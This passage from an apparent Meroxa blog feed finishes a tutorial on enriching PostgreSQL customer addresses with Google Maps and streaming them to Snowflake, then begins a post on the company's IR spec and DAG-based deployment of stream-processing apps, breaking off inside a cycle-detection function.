--username meroxa_user \
--password $SNOWFLAKE_PRIVATE_KEY&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing Turbine&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init part-one-google-maps-enrichment &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Writing your Turbine code&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;part-one-google-maps-enrichment&lt;/code&gt; folder in your preferred IDE. You will see boilerplate code that shows where to wire up the sources and destinations you created in Step 1. In our case, we just need the following to set up the connection between PostgreSQL and Snowflake:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// In our case we named it pg_db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to read in your PostgreSQL DB&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customers&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// Optionally, process each record that comes in!&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; transformed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;transform&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Third, identify your Snowflake destination name as configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;snowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which table to write that data to&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;transformed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_addresses_enriched&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;await turbine.process&lt;/code&gt; allows developers to register a function that will be run on each record. We will preprocess our data before sending it to Snowflake. Below is our &lt;code class=&quot;language-text&quot;&gt;transform&lt;/code&gt; function, which loops through each record coming in from the data stream. We call the Google Maps API on the address field of every record and generate an address object that contains metadata about the address. Later, we write that metadata to a new table in Snowflake.&lt;/p&gt;
&lt;p&gt;💡 You can view the complete repository for this data app on GitHub &lt;a href=&quot;https://github.com/meroxa/turbine-js-examples/tree/master/postgres-snowflake-google-maps-enrich&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;transform&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; customer_address &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_address&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[DEBUG] customer_address ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; customer_address&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;customer_address &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; customer_address&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[ERR] customer_address ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; customer_address&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        	&lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
      	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

      	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; googleMapsLookupResponse &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;googleMapsLookup&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;customer_address&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[DEBUG] googleMapsLookupResponse ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[ERR] googleMapsLookupResponse ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
          &lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; address_metadata &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;generateAddressObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[DEBUG] address_metadata ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;address_metadata&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; key &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;unwrap&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
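The `generateAddressObject` helper above is defined in the example repository; a minimal sketch of what such a helper might do is shown below. The response shape (`results[0].geometry.location`, `formatted_address`, `place_id`) follows the public Google Maps Geocoding API, but the output field names here are illustrative assumptions, not the repository's exact implementation:

```javascript
// Hypothetical sketch: flatten a Google Maps Geocoding-style response
// into a flat metadata object suitable for record.set(key, value).
// Output field names are assumptions for illustration.
function generateAddressObject(googleMapsLookupResponse) {
  const result = googleMapsLookupResponse.results[0];
  return {
    formatted_address: result.formatted_address,
    place_id: result.place_id,
    latitude: result.geometry.location.lat,
    longitude: result.geometry.location.lng,
  };
}
```

Because the object is flat, the `for (var key in address_metadata)` loop in `transform` can copy each field onto the record as its own column.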
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your App&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once your app is deployed, you will see your Snowflake DB populate with all the enriched data from the PostgreSQL table. You can also insert a record into your table to see it stream over to Snowflake in real-time!&lt;/p&gt;
&lt;p&gt;Meroxa sets up all the connections and removes the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;h2&gt;What&apos;s Next&lt;/h2&gt;
&lt;p&gt;In our next blog post we will look at how to use Meroxa with the Twilio API &amp;#x26; Telnyx API to transform telephony data and trigger SMS events to new customers in our database. We will do phone number enrichment to validate which customers in our database have registered with a mobile phone number capable of receiving SMS messages, and then we will trigger SMS messages to those valid numbers. Stay tuned!&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Journey to IR: How Meroxa Improved Stream Processing App Efficiencies]]></title><description><![CDATA[Learn how Meroxa used Intermediate Representation (IR) to improve stream processing application efficiencies.]]></description><link>https://meroxa.com/blog/journey-to-ir</link><guid isPermaLink="false">https://meroxa.com/blog/journey-to-ir</guid><dc:creator><![CDATA[Anna Khachaturova]]></dc:creator><pubDate>Tue, 07 Feb 2023 22:00:59 GMT</pubDate><content:encoded>&lt;p&gt;In April 2022 the Meroxa team introduced a new data application framework, Turbine. Turbine allows users to build, test and deploy data applications using one of three supported languages: &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python&quot;&gt;Python&lt;/a&gt; and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript&quot;&gt;JavaScript&lt;/a&gt;. If you would like to read more about Turbine, please check out the following blogs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/turbine-putting-the-app-in-data-app&quot;&gt;Turbine: Putting the “App” in Data App&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa&quot;&gt;Sync, Transform, &amp;#x26; Migrate data in Real-Time from PostgreSQL to MongoDB w/ Meroxa&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;During the initial design of the Turbine framework, the team agreed upon an orchestration that would help us to evaluate if the framework was worth investing in without introducing too much complexity into our system. When the users would use commands such as “&lt;em&gt;deploy&lt;/em&gt;” and “&lt;em&gt;run&lt;/em&gt;” on their applications, the Meroxa CLI would then process the commands and make appropriate calls to each of the Turbine Language Libraries. For each of the supported languages in the Turbine framework, we developed a corresponding Turbine Language Library that would parse the application code and make separate calls to a Turbine API Client for each of the resources that needed to be created. The Turbine API Client would interact with our Meroxa Platform API to create and manage pipelines, connectors and functions. The example below shows how during application deployment, the following flow was executed across four different code components: CLI, Turbine Language Library, Turbine API Client and Meroxa Platform API.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/WKp8VdGKR0ZjhqNTfvNEhrlRlPWuZdrXmdpn0eWWerjN7SQg7Fe_Nhodi8iG_ry69yOoXy9ao87wMCfVsC1rT_ZVNh1uqT50iJBWTCck2junfVK8xSMgl83FdOqw9tdcUgf6MDwBl5IWifNPzhE6jN4&quot; alt=&quot;Diagram shows how during application deployment, the flow was executed across four different code components: CLI, Turbine Language Library, Turbine API Client and the Meroxa Platform API.&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Evaluating Challenges and Improving our Framework&lt;/h2&gt;
&lt;p&gt;With the release of our Turbine framework being a success, the team decided to redesign the orchestration to be more flexible. As each client needed separate code maintenance, we’d sometimes see deployments behave differently across each supported language. Having a separate Turbine Library and a client for each language posed a challenge for when we would need to add support for other languages. Having both CLI and Turbine API clients handle the calls to the Meroxa Platform API wasn’t ideal as it slowed our ability to test and revert changes. Making any functional changes to application deployment or Turbine logic would also require modifying each Turbine Language Library and client as well. This increased the scope of even the smallest of changes. So we sought to have a more unified place for application orchestration. In order to address these challenges, we looked for a better way to orchestrate the application deployment.&lt;/p&gt;
&lt;h2&gt;Intermediate Representation as a Solution&lt;/h2&gt;
&lt;p&gt;In order to improve the efficiency of Turbine, the team implemented Intermediate Representation, or IR. IR is a blueprint used to deploy a stream processing application. It maps the application&apos;s desired structure, defining how resources are associated with each other and what needs to be created for a stream processing application to be deployed, based on the user&apos;s application definition. The IR spec is sent to the Meroxa Platform API for deployment; you can see an example below.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/e5UCCj-f3lAVTVjpppBY9nKQUELDdpSAKlReUrBmUefbnBgB0QBZhTBYkCt9qPcCWfzskif8vMQtC4Eas_HrU2z2KMgte_Q8aP0lqAq1lAdKGNXyxi-PtGIHHDyCnpHO3ciH4ADvsWp2myOA8Zi3iSs&quot; alt=&quot;Code snippet: An applications IR that has a single source, function and a destination&quot;&gt;&lt;em&gt;(An applications IR that has a single source, function and a destination)&lt;/em&gt;&lt;/p&gt;
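To make the idea concrete in text form as well, here is a hypothetical sketch of an IR document for the same source → function → destination topology, written as a JavaScript object. The field names (`connectors`, `functions`, `streams`, and their keys) are illustrative assumptions, not Meroxa's exact schema — the image above shows the real spec:

```javascript
// Hypothetical IR sketch (illustrative field names, not Meroxa's exact schema)
// for a single source, one function, and one destination.
const irSpec = {
  connectors: [
    { type: "source", resource: "pg_db", collection: "customers" },
    { type: "destination", resource: "snowflake", collection: "customers_enriched" },
  ],
  functions: [{ name: "transform", image: "app-image" }],
  streams: [
    { from: "pg_db", to: "transform" },     // source feeds the function
    { from: "transform", to: "snowflake" }, // function feeds the destination
  ],
};
```

The `streams` entries are what let the Platform API reconstruct the data flow without any per-language logic.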
&lt;p&gt;All resource creation is now handled at the same time by using the definition from the spec. With the functions, connectors and streams of the application defined in IR, the Meroxa Platform API can use the spec to first create a source connector, necessary to retrieve data from source resources. Afterwards, any functions defined in the application are created, and finally the destination connectors are created to transfer the data to destination resources. The Meroxa Platform API knows the flow of data by looking at streams and mapping which resource is the input or output of each. As we can see in the chart below, this removes steps during application deployment and simplifies the process.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/ugHH67aEK31dhb9e1JHA7hBj1F11dheoMKmdZhRYhJoxHYf7dtxwb7r6DX_iGtPXHOY9pLUeZznTwJt7B6r1AA0f_uMtOcflfBA7EZR7dZ_67qVnKNMaUgNRtOkZbkBut2VUqq6D5YxK8Yjxk2ZPiRI&quot; alt=&quot;Diagram: Shows the steps removed during application deployment and simplifies the process.&quot;&gt;&lt;/p&gt;
&lt;p&gt;For additional flexibility, we decided to go with a DAG (Directed Acyclic Graph) approach to building and mapping application resources. This allows us to detect any cycles in the application flow that would cause an infinite loop, and it gives our users more versatility in designing their applications. With a DAG, we introduced the concept of “streams”, which lets us map which resource connects to which in the application flow.&lt;/p&gt;
&lt;p&gt;This flexibility allows users to create data applications with the following topologies, including deployments with multiple destinations:&lt;/p&gt;
&lt;h3&gt;Source → Destination&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source and sent to a destination without a function.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/1Zq6gs1ZBc60DqnpwVcfP-u6luQB5oy-b4gNzKpByQK-9E1MwQWaeZZQr-LPRk4AdAPADaSvfrNpEksKWnYB0o4XI2gGmliJOgNeaCetSSPuJkVT1D7mLwXZRrv6EslGkZawmBxDDzo4KvUH9xJBEEA&quot; alt=&quot;Diagram: Source to Destination[n]&quot;&gt;(source → destination)&lt;/p&gt;
&lt;h3&gt;Source → Destinations[n]&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source and sent to multiple destinations without a function.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/0AUkEwxE4qLjENaxH8F5Ys0GcSl3njltG23or8EdKFJFoCDN0G3FDIfhTdIEI_OMzQHDfrDZOZdSbvxIbdJs_-d0giDTkT3HGi_q5g1yJUedR8xaa3hHxJ1E4xHrGcOEZFjuXqXNeWJeWHhhxNpzeAc&quot; alt=&quot;Diagram: source to destination[n]&quot;&gt;(source → destination[n])&lt;/p&gt;
&lt;h3&gt;Source → Function&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source and sent to a function for processing.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/bMgRnQQRFCm_DkmXd84MxKlI4s_kL6364eoaDx7vAWrrIXPQsM76IR9HUMoDL6GsSY-8bg26EQ9B5R-AsV8lpcDqnXhrU_vQQiQL6HcL5brm2wKYVne7sRL5aUuq5YO2mcafcYud_V_66VxD9-ZMTRk&quot; alt=&quot;Diagram: source to function&quot;&gt;(source → function)&lt;/p&gt;
&lt;h3&gt;Source → Function → Destination&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source to be processed through a function and sent to a destination. An example of a spec with this flow can be seen in the IR spec image above.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/l0J4e0CuKGZlMCXwyOD9l1iWzKVZBRDTsXsmLGrgMZ0zNncCe8G52p1AtzpwW_uMoG7fbTlARqhaeE2iG9BlsM-IRXm4oB3LdFJvIsWxG-0DvNVHKssGWf7e75Pgm8tNeOYOPEbtiL9Rgav_a0voFsY&quot; alt=&quot;Diagram: source to function to destination[n]&quot;&gt;(source → function → destination)&lt;/p&gt;
&lt;h3&gt;Source → Function → Destinations[n]&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source to be processed through a function and sent to multiple destinations.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/Mn75vixFOMhYLihuAvex65HtGnQdr7uOWVW0qMFsK9gTFHjGWWeRmzWqfhjkAllPqJFzum7t0Mnn-auAxP4sjgsKpgEZxL7aOSqXxnrq519k8a5PSEggu8xcBgnprnfJJcf9eSZMFcC2WaMCOmJI3Ck&quot; alt=&quot;Diagram: source to function to destination[n]&quot;&gt;(source → function → destination[n])&lt;/p&gt;
&lt;h3&gt;Source → Destination[0] | Source → Function → Destination[1]&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source and sent as-is to one destination, while also being run through a function for processing and then sent to another destination.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/IE_3hJxmhLkecYaGhCcI8VYv8XcKoULYWFCBR3g9e6e9jkRrtFqlciK36VoRGS_bZyEQjxRKDKhrNzw76osxo3RQyiqVrznsCdNesPvcQDOMU1AtcBObIjNBedGuKRd132UGX5go_kKya8W0ZYoiIlw&quot; alt=&quot;source → destination[0] | Diagram: source to function to destination[1]&quot;&gt;(source → destination[0] | source → function → destination[1])&lt;/p&gt;
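The cycle detection that the DAG approach enables can be illustrated with a depth-first search over the stream graph: any stream that leads back to a node already on the current path means the application would loop forever. This is a minimal sketch of the idea, not Meroxa's actual implementation; the `{ from, to }` stream shape is an assumption for illustration:

```javascript
// Hypothetical sketch: detect a cycle in a stream graph, where each
// stream connects an input node to an output node. Uses depth-first
// search with an "on current path" set; any back-edge means a cycle.
function hasCycle(streams) {
  const adjacency = new Map();
  for (const { from, to } of streams) {
    if (!adjacency.has(from)) adjacency.set(from, []);
    adjacency.get(from).push(to);
  }
  const visited = new Set();
  const onPath = new Set();
  function visit(node) {
    if (onPath.has(node)) return true;   // back-edge: cycle found
    if (visited.has(node)) return false; // already fully explored
    visited.add(node);
    onPath.add(node);
    for (const next of adjacency.get(node) || []) {
      if (visit(next)) return true;
    }
    onPath.delete(node);
    return false;
  }
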